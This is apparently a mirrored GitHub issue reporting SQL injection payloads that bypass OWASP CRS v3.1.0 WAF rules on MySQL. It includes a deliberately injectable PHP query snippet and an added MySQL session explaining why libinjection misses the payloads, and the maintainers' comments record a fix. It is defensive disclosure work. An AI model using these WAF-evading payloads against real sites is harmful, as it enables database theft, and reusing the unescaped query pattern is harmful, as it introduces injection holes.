Bypass the latest CRS v3.1.0 rules of SQL injection
Issue originally created by user qazbnm456 on 2018-09-04 10:47:07. Link to original issue: https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1181
Type of Issue
False Negative
Description
Per https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1167, I want to raise more FNs in this thread.
Before getting into other FNs, I want to give more information on https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1167 so as to help the maintainers fix the issue quickly. There are two problems that lead to those SQLi bypasses, and those evasions would only work with MySQL.
One is the lack of detections for legacy syntaxes, such as the ODBC escape syntax, which is accepted for ODBC compatibility (Ref: https://dev.mysql.com/doc/refman/5.5/en/expressions.html); the other one is the insufficient protection of libinjection due to the parsing process inside ticks. It returns `TYPE_FUNCTION` when it encounters one of the function-name keywords. You can clearly see the difference while parsing the following two queries. Because `1&{f1` isn't in the fingerprint database, it has been flagged as a benign query.
Apart from that, I present additional SQLi bypasses in this issue here, and some of them also play with the same trick mentioned above. Say we have a code snippet that looks like this:

```php
<?php
// Get input
$id = $_REQUEST['id'];
// Check database: $id is interpolated into the query unescaped (the SQL injection sink)
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
$result = mysql_query( $query ) or die( '<pre>' . mysql_error() . '</pre>' );
```
- The following queries would bypass the protections against SQL injection attempts at PL1:

  ```
  a'+(SELECT 1)+'
  -1' AND 2<@ UNION/*!SELECT*/1, version()'
  ```

- The following queries would bypass the protections against SQL injection attempts at PL2:

  ```
  -1'<@=1 OR {a 1}=1 OR '
  -1'<@=1 OR {x (select 1)}='1
  a'+(SELECT 1)+'
  ```
These evasions work well with MySQL but may fail with other DBMSs. I do the trick with the help of the `<@` symbol because libinjection doesn't handle it well, especially with MySQL, and therefore `<@` can be used to bypass the detection of libinjection (Ref: https://github.com/client9/libinjection/blob/master/src/libinjection_sqli_data.h#L8681). Because `1&1o` isn't in the fingerprint database either, it has been flagged as a benign query.
Some screenshots (the vulnerable web application is DVWA):
Your Environment
- CRS version: v3.1/dev 806df0effbb89d2ba069b623162597e488119d2d
- ModSecurity version: v3/master
- Web Server and version: nginx/1.15.0
- Operating System and version: macOS 10.14
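To see why these payloads get past the rules yet still execute, the following MySQL session is an added example (it is not part of the original issue, and not CRS, libinjection or DVWA code). It isolates each MySQL parsing quirk the payloads rely on, then shows every payload as the full query the DVWA snippet above would build. The `users` table and its two rows are constructed for the example; the assumptions are MySQL's behaviour for an empty-named user variable, the ODBC escape syntax from the referenced manual page, and string-to-number coercion in arithmetic.

```sql
-- Added example: constructed stand-in for DVWA's users table (assumption, not DVWA's schema).
CREATE TABLE users (user_id INT, first_name VARCHAR(20), last_name VARCHAR(20));
INSERT INTO users VALUES (1, 'admin', 'admin'), (2, 'gordonb', 'brown');

-- Quirk 1: '@' followed by a non-identifier character is a user variable with an
-- empty name. It is unset, so it reads as NULL, and any comparison with it is NULL
-- (treated as false in WHERE). This is what "<@" exploits.
SELECT @, 2 < @;                              -- NULL, NULL

-- Quirk 2: ODBC escape syntax {identifier expr} evaluates to expr; the identifier is ignored.
SELECT {a 1}, {x (SELECT 1)} = '1';           -- 1, 1

-- Quirk 3: a non-numeric string in arithmetic is coerced to 0 (with a warning).
SELECT 'a' + (SELECT 1) + '';                 -- 1

-- PL1 bypass  a'+(SELECT 1)+'
-- user_id = 0 + 1 + 0, so the row with user_id 1 is returned.
SELECT first_name, last_name FROM users WHERE user_id = 'a'+(SELECT 1)+'';

-- PL1 bypass  -1' AND 2<@ UNION/*!SELECT*/1, version()'
-- Left branch: "... AND 2<@" is "... AND NULL" and matches nothing.
-- /*!SELECT*/ is a MySQL version comment, so SELECT is executed.
-- The trailing '' left by the closing quote in the template becomes an empty column
-- alias; the issue reports that the UNION returns (1, version()).
SELECT first_name, last_name FROM users WHERE user_id = '-1' AND 2<@ UNION/*!SELECT*/1, version()'';

-- PL2 bypass  -1'<@=1 OR {a 1}=1 OR '
-- Parsed as ((user_id = '-1') < @) = 1 OR 1 = 1 OR '': the first term is NULL,
-- the second is true, so every row matches.
SELECT first_name, last_name FROM users WHERE user_id = '-1'<@=1 OR {a 1}=1 OR '';

-- PL2 bypass  -1'<@=1 OR {x (select 1)}='1
-- Same shape; {x (select 1)} = '1' is 1 = '1', i.e. true for every row.
SELECT first_name, last_name FROM users WHERE user_id = '-1'<@=1 OR {x (select 1)}='1';
```

The point for a rule writer is that none of these statements needs a keyword a WAF would normally key on: the tautology is built from `{ }`, a bare `@`, and string arithmetic, which is why the libinjection fingerprints (`1&{f1`, `1&1o`) come out looking benign. The statements are MySQL specific; `{a 1}` and `@` with an empty name are syntax errors in PostgreSQL, for instance.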
Issue Analytics
- Created 3 years ago
- Comments: 5
Top GitHub Comments
User dune73 commented on 2019-04-01 16:46:56:
That sounds like a well thought through proposal. I think you should do this!
User franbuehler commented on 2019-10-24 08:21:40:
Yes, this issue is solved by the mentioned PRs: #1335 and #1326.
Not all SQLi bypasses are detected at PL1, but I think that's not possible.